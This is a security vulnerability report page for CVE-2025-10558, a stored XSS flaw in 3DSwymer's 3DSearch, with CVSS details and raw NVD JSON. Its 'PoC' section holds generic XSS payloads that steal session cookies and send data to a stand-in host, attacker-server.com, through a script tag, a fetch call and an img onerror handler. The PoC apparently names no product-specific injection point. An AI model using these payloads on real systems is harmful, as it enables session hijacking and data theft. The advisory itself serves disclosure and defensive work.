Security Vulnerability Report
CVE-2025-10558 CVSS 8.7 HIGH

Published: 2025-10-13 08:15:39
Last Modified: 2025-12-04 21:40:10

Description

A stored Cross-site Scripting (XSS) vulnerability affecting 3DSearch in 3DSwymer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in a user's browser session.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Weakness
CWE-79

The raw record below also carries a Primary metric of 6.1 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N), which rates privileges required as None and confidentiality/integrity impact as Low; the 8.7 HIGH score shown above is the record's Secondary metric.

Configurations (Affected Products)

cpe:2.3:a:3ds:3dswymer:r2025x:*:*:*:*:*:*:* - VULNERABLE
3DEXPERIENCE R2025x (the 3DSearch function of the 3DSwymer component)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-10558 Stored XSS PoC for 3DSearch in 3DSwymer -->
<!-- This PoC demonstrates a stored XSS attack via the 3DSearch functionality -->
<!-- Step 1: Attacker logs in with low-privilege account -->
<!-- Step 2: Attacker submits a malicious payload through 3DSearch input field -->
<!-- Malicious payload example (to be injected into search input or related fields): -->
<script>
// Steal session cookie and send to attacker's server
var cookie = document.cookie;
var img = new Image();
img.src = 'https://attacker-server.com/steal?cookie=' + encodeURIComponent(cookie);
// Or perform actions on behalf of the victim
// fetch('/api/sensitive-endpoint', { credentials: 'include' })
//   .then(r => r.json())
//   .then(data => {
//     fetch('https://attacker-server.com/exfil', {
//       method: 'POST',
//       body: JSON.stringify(data)
//     });
//   });
</script>
<!-- Alternative payload using event handlers -->
<img src=x onerror="fetch('https://attacker-server.com/steal?cookie='+document.cookie)">
<!-- Step 3: Malicious payload is stored on the server -->
<!-- Step 4: When victim views the search results page, payload executes in their browser -->
<!-- Step 5: Attacker receives victim's session data or performs unauthorized actions -->

References

https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10558 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10558",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T08:15:39.393",
    "lastModified": "2025-12-04T21:40:10.203",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-site Scripting (XSS) vulnerability affecting 3DSearch in 3DSwymer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:3ds:3dswymer:r2025x:*:*:*:*:*:*:*",
                "matchCriteriaId": "DD893EE8-77E1-4790-832D-5AAAB1E8A7F9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10558",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}